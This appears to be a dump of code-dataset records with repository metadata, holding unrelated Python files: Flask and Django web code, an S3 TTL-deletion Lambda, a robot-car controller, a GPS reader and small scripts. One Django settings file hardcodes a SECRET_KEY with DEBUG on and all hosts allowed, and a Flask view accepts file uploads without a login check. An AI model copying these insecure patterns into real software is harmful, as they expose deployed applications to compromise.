exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
|
[
"addnan_98@hotmail.com"
] |
addnan_98@hotmail.com
|
|
f5333922296905d8036b63e545886b126daa6b78
|
09dbecd235fb0108d0e64a0be9c40d938fa5155e
|
/itoit/Views/capitalBancaView.py
|
8bca40254ea3cb7741b816c0be4928c199f0d8d0
|
[] |
no_license
|
ItoIT/Smarthack-ItoIT
|
ea0d06fc672413508ea0e409f7e1caf0c3596919
|
405a054f06719a249d29178cbf2a7c1efc1c7145
|
refs/heads/main
| 2023-01-04T01:03:52.628973 | 2020-11-01T09:13:01 | 2020-11-01T09:13:01 | 308,851,461 | 1 | 0 | null | 2020-11-01T00:29:42 | 2020-10-31T09:56:17 |
JavaScript
|
UTF-8
|
Python
| false | false | 767 |
py
|
from flask import render_template, url_for, redirect, request
from flask_login import login_user, current_user, logout_user, login_required
from itoit import app, db
from itoit.Models import models
@app.route("/capitalbanca", methods=['GET'])
def capitalbanca_get():
firm = models.Firm.query.filter(models.Firm.user_id==current_user.id).first()
return render_template("capitalbanca.jinja", user=current_user, firm=firm)
@app.route("/capitalbanca", methods=['POST'])
def capitalbanca_post():
firm = models.Firm.query.filter(models.Firm.user_id==current_user.id).first()
firm.factura_capital = request.files['completatebanca'].read()
firm.feedback = None
db.session.add(firm)
db.session.commit()
return redirect(url_for("acte_get"))
|
[
"48451420+PredaMihaiDragos@users.noreply.github.com"
] |
48451420+PredaMihaiDragos@users.noreply.github.com
|
9af9714d90dbab4214db386ac0e87a3796cbc58d
|
128999141402ebf1170fa806178b00b394136744
|
/Test/test1.py
|
8dd071425883e374e9da7784098045526e10d035
|
[] |
no_license
|
keeees/RaspberryPi
|
46a4389d52d57c9dd09fbbe8d50b87147f112d0c
|
7129f29c52c945d6a929489b19999f6904c3f7b7
|
refs/heads/master
| 2020-09-03T05:25:33.099078 | 2020-03-22T03:24:11 | 2020-03-22T03:24:11 | 219,396,544 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 578 |
py
|
import wget
import time
from ftplib import FTP  # imported but unused in this test
clock_start = time.perf_counter()  # time.clock() was removed in Python 3.8
time_start = time.time()
for i in range(1):
    url = 'http://192.168.50.142:8000/test.jpg'
    filename = wget.download(url)
clock_end = time.perf_counter()
time_end = time.time()
# time.sleep(0.25)
duration_clock = clock_end - clock_start
print('clock: start =', clock_start, ' end =', clock_end)
print('clock: duration_clock =', duration_clock)
duration_time = time_end - time_start
print('time: start =', time_start, ' end =', time_end)
print('time: duration_time =', duration_time)
|
[
"kesun5@illinois.edu"
] |
kesun5@illinois.edu
|
1cae6677eccc4f88be48e2943c4890ce8ab007a3
|
b977c156350bdd9361facaa8a0a28a3eab0b2818
|
/acbmc/model/blender/constructing/bone_transform_node_factory.py
|
d77071dfe63610bd70b6da4849c75a683bce17f7
|
[] |
no_license
|
Spinu2b/AnimatedCharacterBlenderModelConstructor
|
0df38578ae6bdfa32e54e909b30a313f70d1a55b
|
134257436e2edc812de8df247b7365bef2663b01
|
refs/heads/master
| 2023-06-06T13:36:15.099556 | 2021-06-20T20:52:48 | 2021-06-20T21:01:52 | 293,935,988 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 446 |
py
|
from acbmc.util.model.transform_node import TransformNode
from acbmc.model.blender.model.armature.bone_transform_node import BoneTransformNode
class BoneTransformNodeFactory:
@staticmethod
def get_from_bind_bone_pose(bone_name: str, bind_bone_pose: TransformNode) -> BoneTransformNode:
result = BoneTransformNode()
result.bone_name = bone_name
result.bone_transform = bind_bone_pose.copy()
return result
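# Usage sketch (hypothetical names; assumes TransformNode instances expose the
# copy() method used above):
#
#   node = BoneTransformNodeFactory.get_from_bind_bone_pose('spine', bind_pose)
#   print(node.bone_name)  # 'spine'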
|
[
"spinu2b@gmail.com"
] |
spinu2b@gmail.com
|
e01b8a34f7b5f66a12bde734e35f4d172d5c53be
|
84da878d832a36804eb60372225c93fe12cd7e9c
|
/abc/135/a.py
|
dd2db216c4b09ab70e8006aaa98acc852ab364b5
|
[] |
no_license
|
gensasaki/atcoder
|
abb6be93dffa2f6d8a98a668d659cff04979017a
|
6ce7bb5f8e7b18e76b4a1a30191b8e326cbe3d6a
|
refs/heads/master
| 2020-11-24T21:20:29.883464 | 2019-12-19T05:03:53 | 2019-12-19T05:03:53 | 228,345,768 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 110 |
py
|
A, B = map(int, input().split())
K = (A + B) / 2
ans = int(K) if (A + B) % 2 == 0 else "IMPOSSIBLE"
print(ans)
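# (A + B) / 2 is a whole-number average only when A + B is even; an odd sum has
# no integer midpoint, hence IMPOSSIBLE.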
|
[
"sasakigen11@gmail.com"
] |
sasakigen11@gmail.com
|
006fe964512bd31ae8ce8bffbf812f67aeeede45
|
63045bfda2cfa3b4908c62da8553c8ba9be7dd5c
|
/lambdas/s3ttl.py
|
0329336640da8edf768ab39d0eae32db8e2cde5a
|
[] |
no_license
|
chalfant/s3-ttl-lambda
|
9b75e02f31a85e3c30ea69099fc11c563190e8bc
|
68635c9b330fb76f5b940c76b8920fcce2168e7c
|
refs/heads/master
| 2020-07-28T06:12:35.470279 | 2019-09-17T22:23:48 | 2019-09-17T22:23:48 | 209,334,081 | 0 | 0 | null | 2019-09-18T14:49:39 | 2019-09-18T14:49:38 | null |
UTF-8
|
Python
| false | false | 1,158 |
py
|
import json
import boto3
import os
from datetime import datetime, tzinfo
# import pytz
# utc=pytz.UTC
BUCKET = os.environ['S3_BUCKET']
LOG_LEVEL = os.environ['LOG_LEVEL']
TTL_HOURS = os.environ['TTL_HOURS']
s3 = boto3.resource('s3')
bucket = s3.Bucket(BUCKET)
def conv_secs_to_hours(seconds):
return seconds/60/60
def should_delete(last_modified, ttl):
now = datetime.utcnow()
# print(f'\tnow - ts > ttl {now} - {last_modified} > {ttl}')
diff = now.replace(tzinfo=None) - last_modified.replace(tzinfo=None)
diffseconds = diff.total_seconds()
diffhours = conv_secs_to_hours(diffseconds)
# print(f'\tdiff hours: {diffhours}')
return diffhours > int(ttl)
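# Quick check of the TTL arithmetic with hypothetical values: an object last
# modified 30 hours ago with TTL_HOURS = 24 gives diffhours = 30 > 24 -> delete.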
def handler(event, context):
print(event)
object_summary_iterator = bucket.objects.all()
print('')
things_to_delete = []
for item in object_summary_iterator:
print(item)
# print(f'\tlast_modified: {item.last_modified}')
yesno = should_delete(item.last_modified, TTL_HOURS)
print(f'\tshould delete? {yesno}')
if yesno:
print(f'deleting {item.key} from {item.bucket_name}')
item.delete()
|
[
"rayjan.wilson@gmail.com"
] |
rayjan.wilson@gmail.com
|
fbe96a843221eda18802199f2e7ee8c93a84406a
|
33e021e80fa1a3f41845e118b2e1101072c3eb84
|
/bankroll.py
|
a7da19354e37f5052ab4e32e131e1db15eee65c6
|
[] |
no_license
|
haoyang1234/bitcoin
|
121034bf856551b9e2151078cbc684bab5c3ab23
|
532d3c2a06ca61b5ebdc0eeacf74eeea11bed4b6
|
refs/heads/master
| 2022-04-17T16:31:41.628981 | 2020-02-17T21:44:31 | 2020-02-17T21:44:31 | 239,562,412 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 903 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 10 14:13:51 2019
@author: Hao
"""
import os
import json
import glob
import numpy as np
import pandas as pd
total_pnl = []
name = []
folder1 = "C:\\Users\\Hao\\Desktop\\bitrepo\\Pumpdump&needlecatcher\\Pc-Po 99.5\\"
folder2 = "D:\\bitrepo\\Pumpdump&needlecatcher\\FebAplcsv\\"
result_folder = folder2 # CHANGE THIS TO ADJUST IT TO YOUR FOLDER
os.chdir(result_folder)
for file in glob.glob('*.csv'):
read_in_file = result_folder + file
pair_name = file
print(pair_name)
a = pd.read_csv(read_in_file) # reading CSV
pnl = a['pnl'].tolist()
total_pnl.append(pnl)
name.append(pair_name[:-4])
df = pd.DataFrame(total_pnl).transpose()  # one column of pnl per pair
total_sum = df.sum(axis=1, skipna=True)
a = total_sum[1372:]
N = 1440  # minutes per day
daily = a.groupby(a.index // N).sum()  # aggregate per-minute pnl into daily pnl
print('done')
|
[
"noreply@github.com"
] |
haoyang1234.noreply@github.com
|
2f183e94cac3a5db6b91056570d9c6600e246688
|
bc8ba705e38224681b359922c9a314bf8a9140d1
|
/tests/update_notify_cloudify_configuration/test_copy_ssl_cert.py
|
13b33817da6835be5c3dd636de4c9bd79b29b26d
|
[] |
no_license
|
cloudify-cosmo/cloudify-managed-nagios-plugin
|
14173b019c286a94be367d5d0a79c14b0f5a9413
|
1b9681130a78af5db2d60cb3996dc549d847ef6e
|
refs/heads/master
| 2023-08-01T13:35:27.623384 | 2022-12-01T19:11:36 | 2022-12-01T19:11:36 | 148,599,978 | 0 | 9 | null | 2023-04-09T14:53:41 | 2018-09-13T07:33:33 |
Python
|
UTF-8
|
Python
| false | false | 536 |
py
|
import mock
import tests.links.update_notify_cloudify_configuration as update_config
@mock.patch('tests.links.update_notify_cloudify_configuration.run')
def test_copy_cert(run):
expected_source_path = 'thepathwewant'
config = {
'something': 'yes',
'local_rest_cert_file': expected_source_path,
'other': 'no',
}
update_config.copy_ssl_cert(config)
run_args = run.call_args_list[0][0][0]
assert expected_source_path in run_args
assert update_config.NOTIFY_PLUGIN_CERT in run_args
|
[
"nobody@nowhere.local"
] |
nobody@nowhere.local
|
bb70c83fe48f0a14c8eb090192a8cc964f4e028c
|
049c4629c466676950bc0adcfd2690028297ba01
|
/DJANGO_MOVIE/movies/migrations/0001_initial.py
|
0f33aef5d89b6a16bbee878479dcabbd1d6dbec7
|
[] |
no_license
|
bernow/Python
|
2027a674d47dd1b3322c3678f1efa0082a742d5b
|
04aa7b5236047e076c76c07dfa98286c7e24ae64
|
refs/heads/master
| 2020-08-24T04:56:32.456972 | 2019-11-19T08:23:39 | 2019-11-19T08:23:39 | 216,765,571 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,516 |
py
|
# Generated by Django 2.2.6 on 2019-11-05 11:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Genre',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('audience', models.IntegerField()),
('poster_url', models.TextField()),
('description', models.TextField()),
('genre_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='movies.Genre')),
],
),
migrations.CreateModel(
name='Score',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(max_length=100)),
('score', models.IntegerField()),
('movie_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='movies.Movie')),
],
),
]
|
[
"kok9591@naver.com"
] |
kok9591@naver.com
|
a4f65bb6a45b521a60fef3ecc1413da2148a87d7
|
26b134b48a5556baa0ab8c80dd030d07f3277a46
|
/tests/apps/python/web.py
|
b3e8ef72812a573a4b5a9005d8dccb9fbfa47032
|
[
"MIT"
] |
permissive
|
srr013/dokku
|
376ac5e6fcfce6ba38e11cbece2a2532c401ea35
|
81d31c9934b76d6898a5079f6ec4cb26f706c1ed
|
refs/heads/master
| 2023-01-27T11:31:25.061380 | 2020-12-02T19:19:07 | 2020-12-02T19:19:07 | 318,818,921 | 0 | 0 |
MIT
| 2020-12-05T15:14:36 | 2020-12-05T15:14:36 | null |
UTF-8
|
Python
| false | false | 510 |
py
|
import http.server
import os
class GetHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/plain; charset=utf-8")
self.end_headers()
self.wfile.write("python/http.server".encode("utf-8"))
if __name__ == "__main__":
port = int(os.getenv("PORT", 5000))
server = http.server.HTTPServer(("0.0.0.0", port), GetHandler)
print("Listening on port {0}".format(port))
server.serve_forever()
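# Smoke test (assuming the default PORT of 5000):
#   curl http://localhost:5000/   ->   "python/http.server"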
|
[
"email@josediazgonzalez.com"
] |
email@josediazgonzalez.com
|
e0a422afafd0c518668c019f26bccbc9e6a9bb01
|
6572f29c4472f1bd131dfb0fba441cb5b641ec83
|
/django/mysite_personal_models/blog/urls.py
|
6bdac35817b4968ca9cf7207271375c46c4feef1
|
[] |
no_license
|
kan-abhulimen/jango-training
|
1ccbe04c9f2f481d4482e9fdfd50b1a5b43cc7ae
|
734087392cd9635f00596a7955882f4849883930
|
refs/heads/master
| 2020-03-07T18:37:44.332426 | 2018-01-27T16:11:29 | 2018-01-27T16:11:29 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 545 |
py
|
from django.conf.urls import url, include
from django.views.generic import ListView, DetailView
from blog.models import Post
urlpatterns = [
url(r'^$', ListView.as_view(
queryset=Post.objects.all().order_by("-date")[:25],
template_name="blog/blog.html")),
url(r'^(?P<pk>\d+)$', DetailView.as_view(
model = Post,
template_name="blog/post.html")),
]
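# With these patterns, "/" lists the 25 most recent posts and "/<pk>" renders a
# single post; DetailView looks the Post up by its primary key.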
|
[
"mail_arunn@yahoo.com"
] |
mail_arunn@yahoo.com
|
c442740a0bcbc288556a64daa57037c8a3f469ab
|
d0326c87cda35a4c80d1bb137894a33ca3f1bcc9
|
/jetracer/nvidia_racecar.py
|
ec1631454f4df2f3fb9181022e6a30c9bf3caab6
|
[
"MIT"
] |
permissive
|
tokk-nv/jetracer
|
5a36fcf809348b609331d369d71cca20010c954a
|
e83f11522f75d5f89486442ce2e36624e20970a7
|
refs/heads/master
| 2023-07-03T21:58:25.670731 | 2021-08-09T23:33:58 | 2021-08-09T23:33:58 | 321,274,145 | 1 | 0 |
MIT
| 2021-06-01T20:47:28 | 2020-12-14T07:59:07 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,115 |
py
|
from .racecar import Racecar
import traitlets
from adafruit_servokit import ServoKit
class NvidiaRacecar(Racecar):
i2c_address = traitlets.Integer(default_value=0x40)
steering_gain = traitlets.Float(default_value=-0.65)
steering_offset = traitlets.Float(default_value=0)
steering_channel = traitlets.Integer(default_value=0)
throttle_gain = traitlets.Float(default_value=0.8)
throttle_channel = traitlets.Integer(default_value=1)
def __init__(self, *args, **kwargs):
super(NvidiaRacecar, self).__init__(*args, **kwargs)
self.kit = ServoKit(channels=16, address=self.i2c_address)
self.steering_motor = self.kit.continuous_servo[self.steering_channel]
self.throttle_motor = self.kit.continuous_servo[self.throttle_channel]
@traitlets.observe('steering')
def _on_steering(self, change):
self.steering_motor.throttle = change['new'] * self.steering_gain + self.steering_offset
@traitlets.observe('throttle')
def _on_throttle(self, change):
self.throttle_motor.throttle = change['new'] * self.throttle_gain
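# Usage sketch (assumes the PCA9685 servo board is wired at the i2c_address above
# and that the Racecar base class defines the observed 'steering'/'throttle' traits):
#
#   car = NvidiaRacecar()
#   car.steering = 0.3   # fires _on_steering via traitlets
#   car.throttle = 0.1   # fires _on_throttle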
|
[
"jwelsh@nvidia.com"
] |
jwelsh@nvidia.com
|
50330e7bea315b129dabe997e0dca018f5f5629c
|
f2042aebec30039aaff5c0279f4c9a67e4f79709
|
/config/settings/production.py
|
19047261293b339500d314e16f023c54eec5f457
|
[] |
no_license
|
MarcyNash/django_website
|
c6f2f01a22755396d52b2452d025cc16bd986e03
|
dab5f5bc8c069d38624b2db71635733f4ef61363
|
refs/heads/master
| 2022-11-22T08:15:01.185312 | 2020-07-30T17:42:30 | 2020-07-30T17:42:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,282 |
py
|
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["pythonforthelab.com"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL") # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60) # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": env("REDIS_URL"),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicing memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"] # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
"CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_DEFAULT_ACL = None
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# STATIC
# ------------------------
STATICFILES_STORAGE = "pftl.utils.storages.StaticRootS3Boto3Storage"
COLLECTFAST_STRATEGY = "collectfast.strategies.boto3.Boto3Strategy"
STATIC_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/static/"
# MEDIA
# ------------------------------------------------------------------------------
DEFAULT_FILE_STORAGE = "pftl.utils.storages.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[-1]["OPTIONS"]["loaders"] = [ # type: ignore[index] # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
"DJANGO_DEFAULT_FROM_EMAIL", default="Python for the Lab <noreply@aquicarattino.com>"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env(
    "DJANGO_EMAIL_SUBJECT_PREFIX", default="[Python for the Lab Website]"
)
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"] # noqa F405
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
# https://anymail.readthedocs.io/en/stable/esps/mailgun/
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
ANYMAIL = {
"MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
"MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
"MAILGUN_API_URL": env("MAILGUN_API_URL", default="https://api.mailgun.net/v3"),
}
# Collectfast
# ------------------------------------------------------------------------------
# https://github.com/antonagestam/collectfast#installation
INSTALLED_APPS = ["collectfast"] + INSTALLED_APPS # noqa F405
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"filters": {"require_debug_false": {"()": "django.utils.log.RequireDebugFalse"}},
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"mail_admins": {
"level": "ERROR",
"filters": ["require_debug_false"],
"class": "django.utils.log.AdminEmailHandler",
},
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
},
},
"root": {"level": "INFO", "handlers": ["console"]},
"loggers": {
"django.request": {
"handlers": ["mail_admins"],
"level": "ERROR",
"propagate": True,
},
"django.security.DisallowedHost": {
"level": "ERROR",
"handlers": ["console", "mail_admins"],
"propagate": True,
},
},
}
# Your stuff...
# ------------------------------------------------------------------------------
BASE_URL = 'https://www.pythonforthelab.com'
MANAGERS = (
('Aquiles Carattino', 'aqui.carattino@gmail.com'),
)
FROM_EMAIL = 'aquiles@newsletter.pythonforthelab.com'
DEFAULT_FROM_EMAIL = 'aquiles@newsletter.pythonforthelab.com'  # overrides the env-based default set earlier
|
[
"aqui.carattino@gmail.com"
] |
aqui.carattino@gmail.com
|
d5abc58eeb91065258b67686a5ddda5d762661d7
|
0b8b683b9a0ff758c0c5e1d0a19f90751422618a
|
/@61_.py
|
c2756d3fe5794b77d43b1d79d7efc356909ce082
|
[] |
no_license
|
aushine/100_
|
29712674728eafce9f7bf9a95dd21552c48614be
|
36dd59aa88bc8eca720b654fd9ad3ce11bf61e5a
|
refs/heads/master
| 2020-04-30T23:28:19.836172 | 2019-03-22T13:27:03 | 2019-03-22T13:27:03 | 177,144,771 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 378 |
py
|
# Prints the first ten rows of Pascal's triangle, centered.
if __name__ == "__main__":
a =[]
for each in range(10):
a.append([])
for each_ in range(1, each+2):
a[each].append(1)
for i in range(2, 10):
for j in range(1, i):
a[i][j] = a[i-1][j-1]+a[i-1][j]
b = []
for each in a:
b.append(' '.join(map(str, each)))
for each in b:
print(each.center(26))
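# The top of the centered output looks like:
#              1
#             1 1
#            1 2 1
#           1 3 3 1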
|
[
"161596610@qq.com"
] |
161596610@qq.com
|
fbdc9234549db3a006eb8b446d89f45360fb2362
|
3113b8fd9a0e74e8716ab1fb7bedc851d83c5183
|
/fiesta_family/settings.py
|
968060ca714c315fbd8d6f9e73a9d769f89f5717
|
[] |
no_license
|
ulank1/fiesta
|
478ad3866d3df35e502d60ddd703224fcf173ccf
|
71774598c5180a68c3e0ad75c7325a67ce1a72bc
|
refs/heads/master
| 2020-07-27T08:41:26.330154 | 2016-08-27T12:02:45 | 2016-08-27T12:02:45 | 66,712,427 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,909 |
py
|
"""
Django settings for fiesta_family project.
Generated by 'django-admin startproject' using Django 1.9.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
import dj_database_url
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*r^m0k%n@#i!tunwiware&8ujj9kjupfu^v)_cv3c#^t$z7@5g'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'post'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fiesta_family.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fiesta_family.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
|
[
"ulankarimov@mail.ru"
] |
ulankarimov@mail.ru
|
475728c282b849f2af54a99b7cb1b09018e8ffd4
|
bb0e580e3fd528ea5212f74eaab797116ff42ab9
|
/read_gps_speed.py
|
f9eb48a5af0f09d89218d7334bb6414acdda0dee
|
[] |
no_license
|
8n8/realbikenav
|
0676f41664ca56fe12fbe42b1ebeefe45dab3b8f
|
e493e2247b7e026c9aee3f2ed2c1cd8be6ce7d0f
|
refs/heads/master
| 2023-07-31T02:16:03.832891 | 2018-06-30T12:02:33 | 2018-06-30T12:02:33 | 405,713,661 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 330 |
py
|
""" It reads the GPS receiver and prints out its output. """
import serial # type: ignore
serial_port = serial.Serial('/dev/ttyACM0')
serial_port.baudrate = 115200
while True:
    # readline() returns bytes on Python 3; decode so the 'VTG' comparison can match
    reading = serial_port.readline().decode('ascii', errors='replace')
    for line in reading.splitlines():
        print(line)
        if line[5:8] == 'VTG':  # echo VTG (speed over ground) sentences a second time
            print(line)
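            # Sketch (an assumption, not in the original): the speed over
            # ground of an NMEA VTG sentence sits in field 7, in km/h, e.g.
            #   $GPVTG,054.7,T,034.4,M,005.5,N,010.2,K*48
            # so it could be recovered with:
            #   speed_kmh = float(line.split(',')[7])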
|
[
""
] | |
5cc81a779ecee18c8ef0e63e12697bfe059f8bf0
|
